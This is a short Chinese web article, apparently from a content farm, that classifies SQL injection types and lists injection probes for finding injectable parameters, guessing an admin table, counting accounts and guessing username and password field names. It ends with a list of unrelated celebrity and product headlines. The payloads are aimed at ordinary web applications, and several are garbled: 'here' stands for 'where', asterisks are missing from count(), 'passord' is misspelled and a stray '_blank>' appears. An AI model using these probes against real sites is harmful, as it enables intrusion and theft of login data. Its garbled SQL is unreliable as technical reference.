sql注入语句
sql注入语句是怎样的呢?下面就让我们一起来了解一下吧
sql注入语句其实可以分为三种的,即数字型注入点,语句一般是“select from表名here id=1 and 1=1”;字符型注入点,语句一般是“select from表名here name...”;搜索型注入点。
而sql注入也就是通过将SQL命令插入到Web表单提交或是输入域名、页面请求的查询字符串,最终可以达到欺骗服务器执行恶意的SQL命令。
sql注入类型通常是可以按照不同方式进行分类的,比如若是按照注入点类型来进行分类可以分为数字型注入点、字符型注入点、搜索型注入点,若是按照数据提交的方式来分类,可以分为GET 注入、POST 注入、Cookie 注入、HTTP 头部注入。
也可以按照执行效果来分类,可以分为基于布尔的盲注、基于时间的盲注、基于报错注入、联合查询注入。
其中常用的语句有
1、判断有无注入点
; and 1=1 and 1=2
2、猜表 通常表的名称基本上是admin adminuser user pass passord 等..
and 0<>(select count() from )
and 0<>(select count() from admin) ---判断是否存在admin这张表
3、猜帐号数目 若是遇到0< 返回正确页面 1<返回错误页面那么就说明帐号数目就是1个
and 0<(select count() from admin)
and 1<(select count() from admin)
4、猜解字段名称 在len()括号里面可以加上所想到的字段名称。
and 1=(select count() from admin here len()>0)--
and 1=(select count() from admin here len(用户字段名称name)>0)
and 1=(select count() from admin here len(_blank>密码字段名称passord)>0)
以上就是趣谈网小编的分享了,希望能够帮助到大家。
怪事奇闻
- 河南十大名吃排行榜 鸡蛋灌饼烩面上榜你吃过
- 日本顶级护肤品哪个牌子好用?日本三大贵妇化
- 徐翠翠演过什么?文章个人资料身高
- 中国十大袜子(辽源袜子的名片——辽源袜业:给
- 想知道艺人赖薇如台湾她的所有新闻,看过
- 克拉拉的多面魅力一个不受界限的演员的独特风
- 徐铮电影:值得一看的佳作有哪些
- 徐冬冬在西虹市首富中的幽默表现美女演绎别样
- 吉尼斯记录蛇精-(过气网红cos蛇精照曝光,侧
- 访谈技巧
- 淘宝卖家如何有效采集顾客数据 提升销售的关键
- 如何优化萨摩耶数科的服务体验
- 世界十大家电品牌(电视品牌前十名排行榜)
- 《顶楼3》精彩预告:新季度剧情抢先看
- 温岚瑶瑶获得音乐之声大奖肯定 情系玉树灾区为
- 修杰楷个人资料修杰楷个人资料 修杰楷出演过